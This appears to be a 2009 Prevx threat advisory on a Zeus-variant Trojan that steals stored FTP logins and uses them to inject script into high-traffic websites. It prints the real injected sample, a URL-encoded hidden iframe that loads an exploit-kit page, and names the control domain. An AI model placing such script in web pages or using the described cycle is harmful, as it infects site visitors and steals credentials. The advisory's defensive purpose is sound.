Compromised FTP details being exploited by in the wild malware

On Wednesday the 24th of June, 2009 Prevx detected a new Trojan that is harvesting FTP details from compromised machines. The list of compromised machines is vast, we have seen 66,000 unique FTP server logins from unique domains rising to 74,000 by Friday. The list is now so large we have no way to effectively inform companies in a meaningful timeframe.

What is severity of this infection ?

We rate this infection as CRITICAL. The infection has a ‘china syndrome’ potential. It includes a cyclic infection which leverages infected PCs to programmatically modify hi-volume web sites to infect additional users who become part of the cycle. More users leads to more discovery of web site admin credentials which in turn leads to more web sites being modified to serve the infection which leads to more infected users.

What is the infection Vector ?

The malware infects users that visit a compromised website using various exploit kits such as ‘unique pack’. The compromised WebPages contain an injected script that looks something like the example below:

"var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');"

This will cause the browser to visit the site encoded in the script where an exploit kit will test various exploits against the browser and various other installed applications. Once there is a succcessfull infection various malware packages will be downloaded onto the machine based on Geolocation, installed applications and various other pieces of criteria.

What does the malware do ?

Once installed the malware, which is a variant of the Zeus family, scours the machines stored form cache looking for stored FTP login credentials, then once such logins are found it uses HTTP_POST to send this data to a server located in the Cayman Islands. Additionally, there is another component used, which acts as a script injector. This makes a call to a certain script on the server in the Cayman Islands, using domain goooodbill.cn This script gives the infected client a url in the format USERNAME:PASSWORD@FTP.ADDRESS.COM, the client then logs in to the given ftp site and modifies all index pages (asp,php,html) and injects the script. Once injected all visitors of the modified domain potentially become part of the infection network/cycle.

Has the malware done anything malicious yet ?

YES. As of 15:00 GMT, June 29th 2009, the malware started giving domains to the clients to start infecting. Prevx monitored in a 5 minute period 85 domains being targeted by a single infection. No doubt there are thousands of infected clients already injecting these scripts into the list of growing compromised ftp sites.

What does this mean ?

Using the clients to inject the script into the ftp sites ensures that the criminals remain anonymous. Besides that, they have a massive list of high value, high traffic websites that they can target. This means that potential visitors to the sites will then get infected because of the presence of the script.

As said before, this is not the only malware that the exploit kit serves out, there are various other password stealers, rootkits, et al that get distributed.